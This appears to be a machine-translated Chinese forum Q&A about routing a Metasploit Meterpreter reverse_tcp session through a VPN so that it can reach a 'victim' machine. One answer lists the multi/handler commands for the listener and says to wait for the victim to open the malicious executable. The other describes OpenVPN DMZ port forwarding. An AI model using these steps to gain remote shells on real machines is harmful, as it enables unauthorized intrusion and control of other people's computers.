通过 VPN 的 Meterpreter 会话

信息安全 虚拟专用网 元数据 计程器
2021-09-04 02:29:15

我有以下情况:

攻击者机器连接到路由器,该路由器具有从 ISP 分配的公共 IP,已启用转发。

受害者机器连接到另一个路由器,(显然)从不同的 ISP 分配的不同 IP。

我想用反向 tcp 建立一个 Meterpreter 会话。我使用 msfvenom 创建有效载荷可执行文件,将攻击者路由器的公共 IP 作为 LHOST 参数,然后我启动侦听器,将攻击者机器的本地 IP 设置为 LHOST。

到这里没问题。

我尝试对连接到自制 VPN 服务器的攻击者机器做同样的事情,但没有成功。有可能做到这一点吗?

如果是这样,我必须在有效负载和侦听器中设置哪些 IP 地址才能使其正常工作?

2个回答

如果您使用的是反向 shell,则需要使用攻击者 VPN IP 设置 LHOST,而不是您的内部 LAN IP。此外,您需要使用 Metasploit 在本地侦听您应该在 LPORT 上设置的特定端口,并且必须与 msfvenom 相同(例如 443)。为此,您可以使用:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit

然后等待受害者打开你的恶意可执行文件

是的,如果您使用的是 openvpn,这是可能的。你可以设置一个dmz。Openvpn 有能力做到这一点。如果配置了 dmz,则 vpn 公共 ip 可以将端口转发到其客户端。您应该将 VPN 的 IP 而不是您的内部客户端 IP 设置为 LHOST